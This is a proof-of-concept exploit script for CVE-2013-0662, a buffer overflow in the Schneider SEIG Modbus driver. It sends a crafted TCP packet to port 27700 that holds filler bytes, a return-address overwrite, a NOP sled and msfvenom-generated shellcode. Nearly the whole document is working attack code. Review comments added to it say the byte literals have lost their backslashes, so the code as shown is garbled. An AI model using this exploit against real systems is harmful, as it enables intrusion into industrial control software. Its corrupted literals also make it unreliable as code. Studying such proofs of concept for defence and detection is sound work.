# Title: SEIG Modbus 3.4 - Remote Code Execution
# Author: Alejandro Parodi
# Date: 2018-08-17
# Vendor Homepage: https://www.schneider-electric.com
# Software Link: https://github.com/hdbreaker/Ricnar-Exploit-Solutions/tree/master/Medium/CVE-2013-0662-SEIG-Modbus-Driver-v3.34/VERSION%203.4
# Version: v3.4
# Tested on: Windows XP SP3
# CVE: CVE-2013-0662
# References:
# https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-0662

import socket
import struct

# Target endpoint for the PoC (a private-range address; the header says the
# script was tested against Windows XP SP3). The script is Python 2 syntax:
# `print` is a statement and the str returned by struct.pack is concatenated
# directly with the other string literals.
ip = "192.168.127.138"
port = 27700
con = (ip, port)


####### MESSAGE ##########
# NOTE(review): as extracted, the string literals below carry no backslashes,
# so "x00x64" is six ASCII characters rather than two bytes. The byte counts
# in the comments describe the author's intent, not what this text builds, and
# the lengths printed further down will differ accordingly.
message_header = "x00x64"
message_buffer = "A" * 0x5dc   # 0x5dc = 1500 bytes of one repeated filler byte
eip = struct.pack("<I", 0x7C9C167D)   # 4 bytes, little-endian; the name indicates the intended saved-return-address overwrite

# Shellcode generated with:
# msfvenom -a x86 --platform windows -p windows/exec cmd=calc -e x86/xor_call4 -f python
# Shellcode Size: 189 bytes
nopsleed = "x90" * 100 # x90 bad char bypass
shellcode = "xfcxe8x82x00x00x00x60x89xe5x31xc0x64x8b"
shellcode += "x50x30x8bx52x0cx8bx52x14x8bx72x28x0fxb7"
shellcode += "x4ax26x31xffxacx3cx61x7cx02x2cx20xc1xcf"
shellcode += "x0dx01xc7xe2xf2x52x57x8bx52x10x8bx4ax3c"
shellcode += "x8bx4cx11x78xe3x48x01xd1x51x8bx59x20x01"
shellcode += "xd3x8bx49x18xe3x3ax49x8bx34x8bx01xd6x31"
shellcode += "xffxacxc1xcfx0dx01xc7x38xe0x75xf6x03x7d"
shellcode += "xf8x3bx7dx24x75xe4x58x8bx58x24x01xd3x66"
shellcode += "x8bx0cx4bx8bx58x1cx01xd3x8bx04x8bx01xd0"
shellcode += "x89x44x24x24x5bx5bx61x59x5ax51xffxe0x5f"
shellcode += "x5fx5ax8bx12xebx8dx5dx6ax01x8dx85xb2x00"
shellcode += "x00x00x50x68x31x8bx6fx87xffxd5xbbxf0xb5"
shellcode += "xa2x56x68xa6x95xbdx9dxffxd5x3cx06x7cx0a"
shellcode += "x80xfbxe0x75x05xbbx47x13x72x6fx6ax00x53"
shellcode += "xffxd5x63x61x6cx63x00"

# Message layout: fixed 2-byte header, filler, 4-byte packed value, NOP sled,
# then the msfvenom blob. Only the length is printed; nothing is validated.
message = message_header + message_buffer + eip + nopsleed + shellcode
print "Message Len: " + hex(len(message)) + " bytes"
##########################

######## PKG HEADER ######
header_padding = "x42x42"
header_buf_size = "xFFxFF"
header_recv_len = struct.pack(">H", len(message))   # big-endian 16-bit length of the message that follows
header_end = "x44"

# Package header: 2 padding bytes, a 2-byte "buffer size" field, the 2-byte
# message length, and a 1-byte terminator, as named by the author.
header = header_padding + header_buf_size + header_recv_len + header_end
##########################

######## CRAFTING PAYLOAD ########
payload = header + message
print "Package Len: "+hex(len(payload)) + " bytes"
##################################

# Network behaviour is a single TCP connect followed by one send(); no reply is
# read and the socket is never closed (cleanup is left to interpreter exit).
# Defensive note: the observable is one unsolicited connection to port 27700
# whose body is dominated by long runs of a single repeated byte (the "A" filler
# and the NOP sled) followed by an opaque blob -- a reasonable key for a network
# signature; remediation is tracked under CVE-2013-0662 (see the file header
# references).
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect(con)
s.send(payload)